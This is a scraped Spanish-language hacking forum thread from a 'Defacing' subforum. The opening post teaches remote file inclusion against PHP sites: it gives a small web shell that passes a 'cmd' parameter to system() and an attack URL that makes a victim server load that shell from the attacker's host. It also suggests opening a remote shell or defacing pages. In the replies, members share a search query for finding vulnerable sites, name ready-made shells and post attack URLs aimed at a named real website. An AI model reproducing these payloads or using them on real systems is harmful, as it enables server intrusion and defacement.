Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 07, 2008, 02:35:18
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Remote file inclusion (Insertar archivo remotamente) 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Remote file inclusion (Insertar archivo remotamente)  (Leído 2200 veces)
ManCuerTex
Visitante
« en: Octubre 29, 2005, 11:23:46 »
Voy a explicar esta técnica ya que al parecer hoy me sobra el tiempo xD.

Esta técnica nos permite incluir archivos en algun servidor remotamente, lo que haremos sera aprovecharnos de una vulnerabilidad en el código como esta
Código:
<?
include "$página";
?>

Viendo esto, ya somos capaces de ejecutar un archivo remotamente en el servidor, pero vamos a complicarlo un poco mas, vamos a ejecutar un archivo de código php. Para ello crearemos un script en php sencillo y lo guardaremos como juankers.vip, que porque le ponemos esa extensión? porque si le pusieramos extension php o html nuestro propio servidor donde lo cargasemos lo ejecutaría, y eso no queremos que pase Cheesy.

Tenemos el archivo creado, vamos a crear una función.

Código:
<?
system($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
system();

Ya tenemos el archivo con código y con la extensión cambiada listo para ser subido a nuestro servidor, lo subimos y nos queda algo como esto:
http://www.mancuertex.com/juankers.vip
Ahora solo falta realizar el ataque al servidor "víctima"
http://www.servervictima.com/index.php?page=http://www.soyjuanker.com/juankers.vip?&cmd=comando;
Ahora solo ace falta elegir un comando, si usáis vuestra imaginación podéis hacer que cree una shell remota por el puerto XXXX que será por el que vosotros accederéis al servidor o simplemente si el servidor es windows usamos un "Net start telnet" para poder entrar vía telnet. Podéis hacer lo que queráis...!

O lo típico... que esta de moda, que es cambiar el index de la página.


ByeZ
« Última modificación: ſeptiembre 10, 2008, 05:51:28 por ManCuerTex (ViPeR) » En línea
Kamus.
Visitante
« Respuesta #1 en: Octubre 29, 2005, 02:17:23 »
Una duda
El servior Remoto guardara log. de ip y toda la informacion que el pida  Huh
En línea
ManCuerTex
Visitante
« Respuesta #2 en: Octubre 29, 2005, 04:52:41 »
En línea
Vardor
Visitante
« Respuesta #3 en: Octubre 29, 2005, 11:38:20 »
En línea
TOXiT
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5



Ver Perfil Email
« Respuesta #4 en: Junio 02, 2006, 03:51:05 »
En línea
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #5 en: Junio 05, 2006, 05:33:15 »
 la web adopting.org Cheesy

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
rehizner
Miembro
*****
Desconectado Desconectado

Mensajes: 52


rehizner@gmail.com
Ver Perfil Email
« Respuesta #6 en: Junio 05, 2006, 06:34:15 »
ay alguna forma de buscar en google una pagina vulnerable a ese atake ?
En línea
zickox
Miembro
*****
Desconectado Desconectado

Mensajes: 113


Ver Perfil
« Respuesta #7 en: Junio 05, 2006, 09:11:46 »
prueba esto  allinurl: index.php?page=


salu2
En línea
Mario-ML
Miembro
*****
Desconectado Desconectado

Mensajes: 91



Ver Perfil
« Respuesta #8 en: Junio 06, 2006, 09:34:20 »
hola amigos tengo una pregunta donde puedo conseguir shell ya echos x q se q hay pero donde los puedo conseguir, y tambien uno al escaner con el SSS como encuentro ese error no se si me dejo entender.. espero su respuesta
En línea
Estoy feliz por que voy a tener un hijo y tener a mi lado a la mujer de mi vida, la amo con todo mi corazon...ML
ManCuerTex
Visitante
« Respuesta #9 en: Junio 06, 2006, 01:24:52 »
En línea
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #10 en: Junio 15, 2006, 04:19:51 »
En línea

Activar photoshop cs2
Como poner mi firma
ManCuerTex
Visitante
« Respuesta #11 en: Junio 16, 2006, 09:06:10 »
En línea
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #12 en: Junio 16, 2006, 09:09:54 »
si eso lo intente y me dice pagina no encontrada

tiene ke ser gif por cojones?? yo lo puse .php
En línea

Activar photoshop cs2
Como poner mi firma
ManCuerTex
Visitante
« Respuesta #13 en: Junio 16, 2006, 11:41:40 »
Cita de: Azmo en Junio 16, 2006, 09:09:54
si eso lo intente y me dice pagina no encontrada

tiene ke ser gif por cojones?? yo lo puse .php

la extension que mas te guste, yo uso la extension LOL xDDD.
Puedes poner un screen con el error y la url completa? (almenos la parte importante)

Saludos!
En línea
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #14 en: Junio 16, 2006, 11:49:54 »
bueno el url es este


http://www.bigjimindustries.com/community/templates/deluxe/postreply.php?templatefolder=akimishell.php?&cmd=ls


y el error es este

Fatal error: Call to undefined function rteSafe() in D:\HTTP-LMI\BigJimIndustries.com\public_html\community\templates\deluxe\postreply.php on line 76
En línea

Activar photoshop cs2
Como poner mi firma
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #15 en: Junio 16, 2006, 12:30:30 »
Cita de: Azmo en Junio 16, 2006, 11:49:54
bueno el url es este


http://www.bigjimindustries.com/community/templates/deluxe/postreply.php?templatefolder=akimishell.php?&cmd=ls


y el error es este

Fatal error: Call to undefined function rteSafe() in D:\HTTP-LMI\BigJimIndustries.com\public_html\community\templates\deluxe\postreply.php on line 76



 Es que no estas poniendo tu shell!! mira aca puedes entrar con la mia...

http://www.bigjimindustries.com/community/templates/deluxe/postreply.php?templatefolder=http://ar.geocities.com/pr0gr4mer/shell.txt?cmd=ls;

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #16 en: Junio 16, 2006, 12:32:09 »
xDDDD a ver en ese url e kita oel de mi shell xDDD y entre en esa tuya y salen los mismos errores xDD

pd: en la tuya salen mas errores
« Última modificación: Junio 16, 2006, 12:33:07 por Azmo » En línea

Activar photoshop cs2
Como poner mi firma
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #17 en: Junio 16, 2006, 12:36:47 »
Cita de: Azmo en Junio 16, 2006, 12:32:09
xDDDD a ver en ese url e kita oel de mi shell xDDD y entre en esa tuya y salen los mismos errores xDD

pd: en la tuya salen mas errores

 Recien estaba adentro :S no se que paso...

 Pr0gr4mer
En línea



 Tu respuesta esta dandole click al San Buscador

 .::Pr0gr4mer::.
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #18 en: Junio 16, 2006, 12:53:25 »
« Última modificación: Junio 17, 2006, 02:31:29 por Azmo » En línea

Activar photoshop cs2
Como poner mi firma
ManCuerTex
Visitante
« Respuesta #19 en: Junio 17, 2006, 09:44:15 »
En línea
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #20 en: Junio 17, 2006, 09:48:10 »
si ya baje algunas komo c99 o la r57 y tengo el dreamweaver asike probare con eso  Grin
En línea

Activar photoshop cs2
Como poner mi firma
ManCuerTex
Visitante
« Respuesta #21 en: Junio 19, 2006, 09:27:37 »
En línea
rehizner
Miembro
*****
Desconectado Desconectado

Mensajes: 52


rehizner@gmail.com
Ver Perfil Email
« Respuesta #22 en: Junio 19, 2006, 01:01:05 »
una pregunta, q se significa "Ls"
En línea
rehizner
Miembro
*****
Desconectado Desconectado

Mensajes: 52


rehizner@gmail.com
Ver Perfil Email
« Respuesta #23 en: Junio 19, 2006, 02:07:45 »
a, ya encontre la respuesta http://foro.el-hacker.com/index.php/topic,49358.0.html
siento las molestias
En línea
El92rozn
Miembro
*****
Desconectado Desconectado

Mensajes: 139



Ver Perfil
« Respuesta #24 en: Junio 20, 2006, 01:50:38 »
viper, execelente tutorial! he cnseguido entenderlo todo pero necesito una ayudita. Podeis comentarme que conmandos se podrian usar??

gracias
En línea
Páginas: [1] 2 Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Remote file inclusion (Insertar archivo remotamente) « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC